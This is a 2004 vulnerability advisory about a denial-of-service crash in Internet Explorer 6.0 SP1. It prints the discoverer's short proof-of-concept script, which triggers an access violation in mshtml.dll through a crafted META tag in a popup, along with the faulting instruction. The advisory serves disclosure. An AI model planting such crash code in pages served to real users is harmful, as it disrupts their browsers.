Reported May 17, 2004, by Mike Mauler

VERSIONS AFFECTED

  • Microsoft Internet Explorer (IE) 6.0 Service Pack 1 (SP1)

DESCRIPTION
A vulnerability in IE 6.0 SP1 could result in a Denial of Service (DoS) condition. By using a malformed HTML page containing JavaScript code with a specially crafted META tag, a potential attacker could cause IE to terminate with an access violation.

DEMONSTRATION
The discoverer posted the following code as proof of concept:

The following script code will cause Internet Explorer to crash when trying to parse the META tag contained within. The problem stems from a bug in the MSHTML library (mshtml.dll). Below is the script code that causes the crash:

<scr!pt type="text/javascript">
        Wnd = window.createPopup();
        Wnd.document.body.innerHTML='<meta http-equiv="imagetoolbar" content="no">';
</scr!pt>


The effect of the META tag is to cause an access violation within mshtml.dll, however not exploitable. The problematic piece of code is shown below:

636D54AF    8B48 2C         MOV     ECX, \[EAX+2C\]
EAX = 0, Bad read of address 0x0000002C

VENDOR RESPONSE
Microsoft hasn't released a fix or bulletin that addresses this vulnerability.

CREDIT
Discovered by Mike Mauler.